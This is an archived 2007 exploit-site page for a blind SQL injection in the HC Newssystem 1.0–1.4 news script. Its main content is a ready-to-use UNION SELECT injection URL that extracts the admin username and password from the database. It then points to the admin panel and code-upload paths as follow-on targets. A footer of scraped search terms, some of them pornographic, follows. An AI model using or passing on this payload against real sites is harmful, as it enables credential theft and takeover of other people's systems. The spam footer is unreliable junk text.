about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , HC Newssystem 1.0-1.4 (index.php ID) Remote SQL Injection Vulnerability




2007-03-11 HC Newssystem 1.0-1.4 (index.php ID) Remote SQL Injection Vulnerability 
Rated as : Moderate Risk

HC NEWSSYSTEM 1.0-4 (index.php "ID") Blind SQL Injection

Type :

SQL Injection

Release Date :

{2007-03-08}

Product / Vendor :

HC Design News Publisher.

http://www.hcdesign.at/demo

Bug :

http://localhost/script/index.php?option=news&aktion=komm&ID=-SQL Inj.-

SQL Inj Code :

Admin Username/Password Query

http://localhost/path/index.php?option=news&aktion=komm&ID=-1/**/UNION/**/SELECT/**/null,null,mname,null,mpassword,null,null/**/FROM/**/hcmitglieder/**/WHERE/**/id=1/*

Tested :

HC NEWSSYSTEM Version:1.4

Vulnerable :

HC NEWSSYSTEM Version:1.0

-------------------------

HC NEWSSYSTEM Version:1.4

Note :

Title

"HC NEWSSYSTEM Version:1.4"

Admin Panel

http://www.victim.com/[path]/admin

Code Upload

http://www.victim.com/[path]/admin/upload.php

Author :

UniquE-Key{UniquE-Cracker}
UniquE(at)UniquE-Key.Org
securitydot.net - 2007-03-11

Advertising

Copyright 2007, SecurityDot
Fri, 20 Nov 2009 22:25:03 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
amateur.co xxx free s Nice work! Nacked pic cent virel Www hotswe Pinkvisual tamil scho invision p ec.schr.cn administra bless Nacked pic Www hotswe VB6 Gayhot pic kesavan.ba www.sexey www.tamilx Pmb result WS FTP 1.0 sexyheroin justin tin butt apache2 indian.act www.qzsmlz php news r Pornoindes www.sexy c www.zhmf51 Sabdrimer Dropbear s Bf indo actor xxx OPEN REMOT news for c google vid webmin kim possib Saxy women kareena se Pornomovie Sabdrimer /search/ex lo263l indian fuc naced woma iimahatygy